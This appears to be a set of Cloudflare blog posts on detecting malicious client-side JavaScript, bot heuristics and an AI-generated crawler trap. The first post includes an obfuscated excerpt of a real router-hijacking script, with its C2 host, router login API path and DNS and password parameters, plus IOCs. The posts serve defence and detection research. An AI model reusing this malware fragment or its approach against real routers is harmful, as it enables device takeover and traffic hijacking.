The Cloudflare Blog

Cloudflare Client-Side Security: smarter detection, now open to everyone

Zhiyuan Zheng — Mon, 30 Mar 2026 06:00:00 GMT

Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it needs is just one malicious script tag.

If that sounds abstract, here are two recent examples of such skimming attacks:

In January 2026, Sansec reported a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.
In September 2025, attackers published malicious releases of widely used npm packages. If those packages were bundled into front-end code, end users could be exposed to crypto-stealing in the browser.

To further our goal of building a better Internet, Cloudflare established a core tenet during our Birthday Week 2025: powerful security features should be accessible without requiring a sales engagement. In pursuit of this objective, we are announcing two key changes today:

First, Cloudflare Client-Side Security Advanced (formerly Page Shield add-on) is now available to self-serve customers. And second, domain-based threat intelligence is now complimentary for all customers on the free Client-Side Security bundle.

In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.

How Cloudflare Client-Side Security works

Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting 2,200 scripts per enterprise zone on average.

Under the hood, Client-Side Security collects these signals using browser reporting (for example, Content Security Policy), which means you don’t need scanners or app instrumentation to get started, and there is zero latency impact to your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.

Client-Side Security Advanced provides immediate access to powerful security features:

Smarter malicious script detection: Using in-house machine learning, this capability is now enhanced with assessments from a Large Language Model (LLM). Read more details below.
Code change monitoring: Continuous code change detection and monitoring is included, which is essential for meeting compliance like PCI DSS v4, requirement 11.6.1.
Proactive blocking rules: Benefit from positive content security rules that are maintained and enforced through continuous monitoring.

Detecting malicious intent JavaScripts

Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.

Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.

Instead, our detection strategy focuses on what a script is trying to do. That includes intent classification work we’ve written about previously. In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.

The high cost of false positives

Client-side security operates differently than active vulnerability scanners deployed across the web, where a Web Application Firewall (WAF) would constantly observe matched attack signatures. While a WAF constantly blocks high-volume automated attacks, a client-side compromise (such as a breach of an origin server or a third-party vendor) is a rare, high-impact event. In an enterprise environment with rigorous vendor reviews and code scanning, these attacks are rare.

This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.

Adding an LLM-based second opinion for triage

Our frontline detection engine is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.

The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its precision is already remarkably high: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of 3.5 billion scripts assessed daily, even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.

The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts — like bot challenges, tracking pixels, ad-tech bundles, and minified framework builds — can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.

This is precisely where Large Language Models (LLMs) complement the GNN. LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.

Rather than replacing the GNN, we designed a cascading classifier architecture:

Every script is first evaluated by the GNN. If the GNN predicts the script as benign, the detection pipeline terminates immediately. This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM.
If the GNN flags the script as potentially malicious (above the decision threshold), the script is forwarded to an open-source LLM hosted on Cloudflare Workers AI for a second opinion.
The LLM, provided with a security-specialized prompt context, semantically evaluates the script’s intent. If it determines the script is benign, it overrides the GNN’s verdict.

This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.

As we previously explained, our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via Workers AI using open-source models (we currently use gpt-oss-120b).

As an additional safety net, every script flagged by the GNN is logged to Cloudflare R2 for posterior analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.

The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets a whopping ~200x, from ~1.39% down to just 0.007%.

At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism:as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.

Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.

Catching zero-days in the wild: The `core.js` router exploit

This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script (core.js) targeting users in specific regions.

In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like wanType=dhcp, wanType=static, and wanType=pppoe), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.

To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal have not yet reported detections at the time of this writing.

Our GNN successfully revealed the underlying malicious structure despite the obfuscation, and the Workers AI LLM confidently confirmed the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:

const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&asyn=0&auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&autoset=1&dns1=','fNKHB','nGkgt','aiEOB','dpwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));

This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.

Indicators of Compromise (IOCs)

URL: hxxps://ns[.]qpft5[.]com/ads/core[.]js
SHA-256: 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202
C2 Domain: hxxps://api[.]qpft5[.]com

Domain-based threat intelligence free for all

Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.

In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.

By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.

To begin, simply enable Client-Side Security with a toggle in the dashboard. We will then highlight any JavaScript or connections associated with a known malicious domain.

Get started with Client-Side Security Advanced for PCI DSS v4

To learn more about Client-Side Security Advanced pricing, please visit the plans page. Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.

Client-Side Security Advanced has all the tools you need to meet the requirements of PCI DSS v4 as an e-commerce merchant, particularly 6.4.3 and 11.6.1. Sign up today in the dashboard.

Improved Bot Management flexibility and visibility with new high-precision heuristics

Curtis Lowder — Wed, 19 Mar 2025 13:00:00 GMT

Within the Cloudflare Application Security team, every machine learning model we use is underpinned by a rich set of static rules that serve as a ground truth and a baseline comparison for how our models are performing. These are called heuristics. Our Bot Management heuristics engine has served as an important part of eight global machine learning (ML) models, but we needed a more expressive engine to increase our accuracy. In this post, we’ll review how we solved this by moving our heuristics to the Cloudflare Ruleset Engine. Not only did this provide the platform we needed to write more nuanced rules, it made our platform simpler and safer, and provided Bot Management customers more flexibility and visibility into their bot traffic.

Bot detection via simple heuristics

In Cloudflare’s bot detection, we build heuristics from attributes like software library fingerprints, HTTP request characteristics, and internal threat intelligence. Heuristics serve three separate purposes for bot detection:

Bot identification: If traffic matches a heuristic, we can identify the traffic as definitely automated traffic (with a bot score of 1) without the need of a machine learning model.
Train ML models: When traffic matches our heuristics, we create labelled datasets of bot traffic to train new models. We’ll use many different sources of labelled bot traffic to train a new model, but our heuristics datasets are one of the highest confidence datasets available to us.
Validate models: We benchmark any new model candidate’s performance against our heuristic detections (among many other checks) to make sure it meets a required level of accuracy.

While the existing heuristics engine has worked very well for us, as bots evolved we needed the flexibility to write increasingly complex rules. Unfortunately, such rules were not easily supported in the old engine. Customers have also been asking for more details about which specific heuristic caught a request, and for the flexibility to enforce different policies per heuristic ID. We found that by building a new heuristics framework integrated into the Cloudflare Ruleset Engine, we could build a more flexible system to write rules and give Bot Management customers the granular explainability and control they were asking for.

The need for more efficient, precise rules

In our previous heuristics engine, we wrote rules in Lua as part of our openresty-based reverse proxy. The Lua-based engine was limited to a very small number of characteristics in a rule because of the high engineering cost we observed with adding more complexity.

With Lua, we would write fairly simple logic to match on specific characteristics of a request (i.e. user agent). Creating new heuristics of an existing class was fairly straight forward. All we’d need to do is define another instance of the existing class in our database. However, if we observed malicious traffic that required more than two characteristics (as a simple example, user-agent and ASN) to identify, we’d need to create bespoke logic for detections. Because our Lua heuristics engine was bundled with the code that ran ML models and other important logic, all changes had to go through the same review and release process. If we identified malicious traffic that needed a new heuristic class, and we were also blocked by pending changes in the codebase, we’d be forced to either wait or rollback the changes. If we’re writing a new rule for an “under attack” scenario, every extra minute it takes to deploy a new rule can mean an unacceptable impact to our customer’s business.

More critical than time to deploy is the complexity that the heuristics engine supports. The old heuristics engine only supported using specific request attributes when creating a new rule. As bots became more sophisticated, we found we had to reject an increasing number of new heuristic candidates because we weren’t able to write precise enough rules. For example, we found a Golang TLS fingerprint frequently used by bots and by a small number of corporate VPNs. We couldn’t block the bots without also stopping the legitimate VPN usage as well, because the old heuristics platform lacked the flexibility to quickly compile sufficiently nuanced rules. Luckily, we already had the perfect solution with Cloudflare Ruleset Engine.

Our new heuristics engine

The Ruleset Engine is familiar to anyone who has written a WAF rule, Load Balancing rule, or Transform rule, just to name a few. For Bot Management, the Wireshark-inspired syntax allows us to quickly write heuristics with much greater flexibility to vastly improve accuracy. We can write a rule in YAML that includes arbitrary sub-conditions and inherit the same framework the WAF team uses to both ensure any new rule undergoes a rigorous testing process with the ability to rapidly release new rules to stop attacks in real-time.

Writing heuristics on the Cloudflare Ruleset Engine allows our engineers and analysts to write new rules in an easy to understand YAML syntax. This is critical to supporting a rapid response in under attack scenarios, especially as we support greater rule complexity. Here’s a simple rule using the new engine, to detect empty user-agents restricted to a specific JA4 fingerprint (right), compared to the empty user-agent detection in the old Lua based system (left):

Old

New

local _M = {}

local EmptyUserAgentHeuristic = {

heuristic = {},

}

EmptyUserAgentHeuristic.__index = EmptyUserAgentHeuristic

--- Creates and returns empty user agent heuristic

-- @param params table contains parameters injected into EmptyUserAgentHeuristic

-- @return EmptyUserAgentHeuristic table

function _M.new(params)

return setmetatable(params, EmptyUserAgentHeuristic)

end

--- Adds heuristic to be used for inference in `detect` method

-- @param heuristic schema.Heuristic table

function EmptyUserAgentHeuristic:add(heuristic)

self.heuristic = heuristic

end

--- Detect runs empty user agent heuristic detection

-- @param ctx context of request

-- @return schema.Heuristic table on successful detection or nil otherwise

function EmptyUserAgentHeuristic:detect(ctx)

local ua = ctx.user_agent

if not ua or ua == '' then

return self.heuristic

end

return _M

ref: empty-user-agent

description: Empty or missing

User-Agent header

action: add_bot_detection

action_parameters:

active_mode: false

expression: http.user_agent eq

"" and cf.bot_management.ja4 = "t13d1516h2_8daaf6152771_b186095e22b6"

The Golang heuristic that captured corporate proxy traffic as well (mentioned above) was one of the first to migrate to the new Ruleset engine. Before the migration, traffic matching on this heuristic had a false positive rate of 0.01%. While that sounds like a very small number, this means for every million bots we block, 100 real users saw a Cloudflare challenge page unnecessarily. At Cloudflare scale, even small issues can have real, negative impact.

When we analyzed the traffic caught by this heuristic rule in depth, we saw the vast majority of attack traffic came from a small number of abusive networks. After narrowing the definition of the heuristic to flag the Golang fingerprint only when it’s sourced by the abusive networks, the rule now has a false positive rate of 0.0001% (One out of 1 million). Updating the heuristic to include the network context improved our accuracy, while still blocking millions of bots every week and giving us plenty of training data for our bot detection models. Because this heuristic is now more accurate, newer ML models make more accurate decisions on what’s a bot and what isn’t.

New visibility and flexibility for Bot Management customers

While the new heuristics engine provides more accurate detections for all customers and a better experience for our analysts, moving to the Cloudflare Ruleset Engine also allows us to deliver new functionality for Enterprise Bot Management customers, specifically by offering more visibility. This new visibility is via a new field for Bot Management customers called Bot Detection IDs. Every heuristic we use includes a unique Bot Detection ID. These are visible to Bot Management customers in analytics, logs, and firewall events, and they can be used in the firewall to write precise rules for individual bots.

Detections also include a specific tag describing the class of heuristic. Customers see these plotted over time in their analytics.

To illustrate how this data can help give customers visibility into why we blocked a request, here’s an example request flagged by Bot Management (with the IP address, ASN, and country changed):

Before, just seeing that our heuristics gave the request a score of 1 was not very helpful in understanding why it was flagged as a bot. Adding our Detection IDs to Firewall Events helps to paint a better picture for customers that we’ve identified this request as a bot because that traffic used an empty user-agent.

In addition to Analytics and Firewall Events, Bot Detection IDs are now available for Bot Management customers to use in Custom Rules, Rate Limiting Rules, Transform Rules, and Workers.

Account takeover detection IDs

One way we’re focused on improving Bot Management for our customers is by surfacing more attack-specific detections. During Birthday Week, we launched Leaked Credentials Check for all customers so that security teams could help prevent account takeover (ATO) attacks by identifying accounts at risk due to leaked credentials. We’ve now added two more detections that can help Bot Management enterprise customers identify suspicious login activity via specific detection IDs that monitor login attempts and failures on the zone. These detection IDs are not currently affecting the bot score, but will begin to later in 2025. Already, they can help many customers detect more account takeover events now.

Detection ID 201326592 monitors traffic on a customer website and looks for an anomalous rise in login failures (usually associated with brute force attacks), and ID 201326593 looks for an anomalous rise in login attempts (usually associated with credential stuffing).

Protect your applications

If you are a Bot Management customer, log in and head over to the Cloudflare dashboard and take a look in Security Analytics for bot detection IDs 201326592 and 201326593.

These will highlight ATO attempts targeting your site. If you spot anything suspicious, or would like to be protected against future attacks, create a rule that uses these detections to keep your application safe.

Trapping misbehaving bots in an AI Labyrinth

Reid Tatoris — Wed, 19 Mar 2025 13:00:00 GMT

Today, we’re excited to announce AI Labyrinth, a new mitigation approach that uses AI-generated content to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives. When you opt in, Cloudflare will automatically deploy an AI-generated set of linked pages when we detect inappropriate bot activity, without the need for customers to create any custom rules.

AI Labyrinth is available on an opt-in basis to all customers, including the Free plan.

Using Generative AI as a defensive weapon

AI-generated content has exploded, reportedly accounting for four of the top 20 Facebook posts last fall. Additionally, Medium estimates that 47% of all content on their platform is AI-generated. Like any newer tool it has both wonderful and malicious uses.

At the same time, we’ve also seen an explosion of new crawlers used by AI companies to scrape data for model training. AI Crawlers generate more than 50 billion requests to the Cloudflare network every day, or just under 1% of all web requests we see. While Cloudflare has several tools for identifying and blocking unauthorized AI crawling, we have found that blocking malicious bots can alert the attacker that you are on to them, leading to a shift in approach, and a never-ending arms race. So, we wanted to create a new way to thwart these unwanted bots, without letting them know they’ve been thwarted.

To do this, we decided to use a new offensive tool in the bot creator’s toolset that we haven’t really seen used defensively: AI-generated content. When we detect unauthorized crawling, rather than blocking the request, we will link to a series of AI-generated pages that are convincing enough to entice a crawler to traverse them. But while real looking, this content is not actually the content of the site we are protecting, so the crawler wastes time and resources.

As an added benefit, AI Labyrinth also acts as a next-generation honeypot. No real human would go four links deep into a maze of AI-generated nonsense. Any visitor that does is very likely to be a bot, so this gives us a brand-new tool to identify and fingerprint bad bots, which we add to our list of known bad actors. Here’s how we do it…

How we built the labyrinth

When AI crawlers follow these links, they waste valuable computational resources processing irrelevant content rather than extracting your legitimate website data. This significantly reduces their ability to gather enough useful information to train their models effectively.

To generate convincing human-like content, we used Workers AI with an open source model to create unique HTML pages on diverse topics. Rather than creating this content on-demand (which could impact performance), we implemented a pre-generation pipeline that sanitizes the content to prevent any XSS vulnerabilities, and stores it in R2 for faster retrieval. We found that generating a diverse set of topics first, then creating content for each topic, produced more varied and convincing results. It is important to us that we don’t generate inaccurate content that contributes to the spread of misinformation on the Internet, so the content we generate is real and related to scientific facts, just not relevant or proprietary to the site being crawled.

This pre-generated content is seamlessly integrated as hidden links on existing pages via our custom HTML transformation process, without disrupting the original structure or content of the page. Each generated page includes appropriate meta directives to protect SEO by preventing search engine indexing. We also ensured that these links remain invisible to human visitors through carefully implemented attributes and styling. To further minimize the impact to regular visitors, we ensured that these links are presented only to suspected AI scrapers, while allowing legitimate users and verified crawlers to browse normally.

^{A graph of daily requests over time, comparing different categories of AI Crawlers.}

What makes this approach particularly effective is its role in our continuously evolving bot detection system. When these links are followed, we know with high confidence that it's automated crawler activity, as human visitors and legitimate browsers would never see or click them. This provides us with a powerful identification mechanism, generating valuable data that feeds into our machine learning models. By analyzing which crawlers are following these hidden pathways, we can identify new bot patterns and signatures that might otherwise go undetected. This proactive approach helps us stay ahead of AI scrapers, continuously improving our detection capabilities without disrupting the normal browsing experience.

By building this solution on our developer platform, we've created a system that serves convincing decoy content instantly while maintaining consistent quality - all without impacting your site's performance or user experience.

How to use AI Labyrinth to stop AI crawlers

Enabling AI Labyrinth is simple and requires just a single toggle in your Cloudflare dashboard. Navigate to the bot management section within your zone, and toggle the new AI Labyrinth setting to on:

Once enabled, the AI Labyrinth begins working immediately with no additional configuration needed.

AI honeypots, created by AI

The core benefit of AI Labyrinth is to confuse and distract bots. However, a secondary benefit is to serve as a next-generation honeypot. In this context, a honeypot is just an invisible link that a website visitor can’t see, but a bot parsing HTML would see and click on, therefore revealing itself to be a bot. Honeypots have been used to catch hackers as early as the late 1986 Cuckoo’s Egg incident. And in 2004, Project Honeypot was created by Cloudflare founders (prior to founding Cloudflare) to let everyone easily deploy free email honeypots, and receive lists of crawler IPs in exchange for contributing to the database. But as bots have evolved, they now proactively look for honeypot techniques like hidden links, making this approach less effective.

AI Labyrinth won’t simply add invisible links, but will eventually create whole networks of linked URLs that are much more realistic, and not trivial for automated programs to spot. The content on the pages is obviously content no human would spend time-consuming, but AI bots are programmed to crawl rather deeply to harvest as much data as possible. When bots hit these URLs, we can be confident they aren’t actual humans, and this information is recorded and automatically fed to our machine learning models to help improve our bot identification. This creates a beneficial feedback loop where each scraping attempt helps protect all Cloudflare customers.

What’s next

This is only the first iteration of using generative AI to thwart bots for us. Currently, while the content we generate is convincingly human, it won’t conform to the existing structure of every website. In the future, we’ll continue to work to make these links harder to spot and make them fit seamlessly into the existing structure of the website they’re embedded in. You can help us by opting in now.

To take the next step in the fight against bots, opt-in to AI Labyrinth today.

How we train AI to uncover malicious JavaScript intent and make web surfing safer

Juan Miguel Cejuela — Wed, 19 Mar 2025 13:00:00 GMT

Modern websites rely heavily on JavaScript. Leveraging third-party scripts accelerates web app development, enabling organizations to deploy new features faster without building everything from scratch. However, supply chain attacks targeting third-party JavaScript are no longer just a theoretical concern — they have become a reality, as recent incidents have shown. Given the vast number of scripts and the rapid pace of updates, manually reviewing each one is not a scalable security strategy.

Cloudflare provides automated client-side protection through Page Shield. Until now, Page Shield could scan JavaScript dependencies on a web page, flagging obfuscated script content which also exfiltrates data. However, these are only indirect indicators of compromise or malicious intent. Our original approach didn’t provide clear insights into a script’s specific malicious objectives or the type of attack it was designed to execute.

Taking things a step further, we have developed a new AI model that allows us to detect the exact malicious intent behind each script. This intelligence is now integrated into Page Shield, available to all Page Shield add-on customers. We are starting with three key threat categories: Magecart, crypto mining, and malware.

^{Screenshot of Page Shield dashboard showing results of three types of analysis.}

With these improvements, Page Shield provides deeper visibility into client-side threats, empowering organizations to better protect their users from evolving security risks. This new capability is available to all Page Shield customers with the add-on. Head over to the dashboard, and you can find the new malicious code analysis for each of the scripts monitored.

In the following sections, we take a deep dive into how we developed this model.

Training the model to detect hidden malicious intent

We built this new Page Shield AI model to detect the intent of JavaScript threats at scale. Training such a model for JavaScript comes with unique challenges, including dealing with web code written in many different styles, often obfuscated yet benign. For instance, the following three snippets serve the same function.

//Readable, plain code
function sayHi(name) {
  console.log(
    `Hello ${
      name ?? 
      "World" //default
    }!`
  );
}
sayHi("Internet");

//Minified
function sayHi(l){console.log(`Hello ${l??"World"}!`)}sayHi("Internet");

//Obfuscated
var h=Q;(function(V,A){var J=Q,p=V();while(!![]){try{var b=-parseInt(J('0x79'))/0x1*(-parseInt(J('0x6e'))/0x2)+-parseInt(J('0x80'))/0x3+parseInt(J('0x76'))/0x4*(-parseInt(J('0x72'))/0x5)+parseInt(J('0x6a'))/0x6+parseInt(J('0x84'))/0x7+-parseInt(J('0x6d'))/0x8*(-parseInt(J('0x7d'))/0x9)+parseInt(J('0x73'))/0xa*(-parseInt(J('0x7c'))/0xb);if(b===A)break;else p['push'](p['shift']());}catch(U){p['push'](p['shift']());}}}(S,0x22097));function sayHi(p){var Y=Q,b=(function(){var W=!![];return function(e,x){var B=W?function(){var m=Q;if(x){var G=x[m('0x71')](e,arguments);return x=null,G;}}:function(){};return W=![],B;};}()),U=b(this,function(){var s=Q,W=typeof window!==s('0x6b')?window:typeof process===s('0x6c')&&typeof require===s('0x7b')&&typeof global==='object'?global:this,e=W['console']=W['console']||{},x=[s('0x78'),s('0x70'),'info',s('0x69'),s('0x77'),'table',s('0x7f')];for(var B=0x0;B


            With such a variance of styles (and many more), our machine learning solution needs to balance precision (low false positive rate), recall (don’t miss an attack vector), and speed. Here’s how we do it:
    
      Using syntax trees to classify malicious code
      
        
      
    
    JavaScript files are parsed into syntax trees (connected acyclic graphs). These serve as the input to a Graph Neural Network (GNN). GNNs are used because they effectively capture the interdependencies (relationships between nodes) in executing code, such as a function calling another function. This contrasts with treating the code as merely a sequence of words — something a code compiler, incidentally, does not do. Another motivation to use GNNs is the insight that the syntax trees of malicious versus benign JavaScript tend to be different. For example, it’s not rare to find attacks that consist of malicious snippets inserted into, but otherwise isolated from, the rest of a benign base code.
To parse the files, the tree-sitter library was chosen for its speed. One peculiarity of this parser, specialized for text editors, is that it parses out concrete syntax trees (CST). CSTs retain everything from the original text input, including spacing information, comments, and even nodes attempting to repair syntax errors. This differs from abstract syntax trees (AST), the data structures used in compilers, which have just the essential information to execute the underlying code while ignoring the rest. One key reason for wanting to convert the CST to an AST-like structure, is that it reduces the tree size, which in turn reduces computation and memory usage. To do that, we abstract and filter out unnecessary nodes such as code comments. Consider for instance, how the following snippet
            x = `result: ${(10+5) *   3}`;;; //this is a comment
            … gets converted to an AST-like representation:
          
          
          
^{Abstract Syntax Tree (AST) representation of the sample code above. Unnecessary elements get removed (e.g. comments, spacing) whereas others get encoded in the tree structure (order of operations due to parentheses).}
One benefit of working with parsed syntax trees is that tokenization comes for free! We collect and treat the node leaves’ text as our tokens, which will be used as features (inputs) for the machine learning model. Note that multiple characters in the original input, for instance backticks to form a template string, are not treated as tokens per se, but remain encoded in the graph structure given to the GNN. (Notice in the sample tree representations the different node types, such as “assignment_expression”). Moreover, some details in the exact text input become irrelevant in the executing AST, such as whether a string was originally written using double quotes vs. single quotes.
We encode the node tokens and node types into a matrix of counts. Currently, we lowercase the nodes' text to reduce vocabulary size, improving efficiency and reducing sparsity. Note that JavaScript is a case-sensitive language, so this is a trade-off we continue to explore. This matrix and, importantly, the information about the node edges within the tree, is the input to the GNN.
How do we deal with obfuscated code? We don’t treat it specially. Rather, we always parse the JavaScript text as is, which incidentally unescapes escape characters too. For instance, the resulting AST shown below for the following input exemplifies that:
            atob('\x55\x32\x56\x75\x5a\x45\x52\x68\x64\x47\x45\x3d') == "SendData"
            
          
          
          
^{Abstract Syntax Tree (AST) representation of the sample code above. JavaScript escape characters are unescaped.}
Moreover, our vocabulary contains several tokens that are commonly used in obfuscated code, such as double escaped hexadecimal-encoded characters. That, together with the graph structure information, is giving us satisfying results — the model successfully classifies malicious code whether it's obfuscated or not. Analogously, our model’s scores remain stable when applied to plain benign scripts compared to obfuscating them in different ways. In other words, the model’s score on a script is similar to the score on an obfuscated version of the same script. Having said that, some of our model's false positives (FPs) originate from benign but obfuscated code, so we continue to investigate how we can improve our model's intelligence.
    
      Architecting the Graph Neural Network
      
        
      
    
    We train a message-passing graph convolutional network (MPGCN) that processes the input trees. The message-passing layers iteratively update each node’s internal representation, encoded in a matrix, by aggregating information from its neighbors (parent and child nodes in the tree). A pooling layer then condenses this matrix into a feature vector, discarding the explicit graph structure (edge connections between nodes). At this point, standard neural network layers, such as fully connected layers, can be applied to progressively refine the representation. Finally, a softmax activation layer produces a probability distribution over the four possible classes: benign, magecart, cryptomining, and malware.
We use the TF-GNN library to implement graph neural networks, with Keras serving as the high-level frontend for model building and training. This works well for us with one exception: TF-GNN does not support sparse matrices / tensors. (That lack of support increases memory consumption, which also adds some latency.) Because of this, we are considering switching to PyTorch Geometric instead.
          
          
          
^{Graph neural network architecture, transforming the input tree with features down to the 4 classification probabilities.}
The model’s output probabilities are finally inverted and scaled into scores (ranging from 1 to 99). The “js_integrity” score aggregates the malicious classes (magecart, malware, cryptomining). A low score means likely malicious, and a high score means likely benign. We use this output format for consistency with other Cloudflare detection systems, such as Bot Management and the WAF Attack Score. The following diagram illustrates the preprocessing and feature analysis pipeline of the model down to the inference results.
          
          
          
^{Model inference pipeline to sniff out and alert on malicious JavaScript.}
    
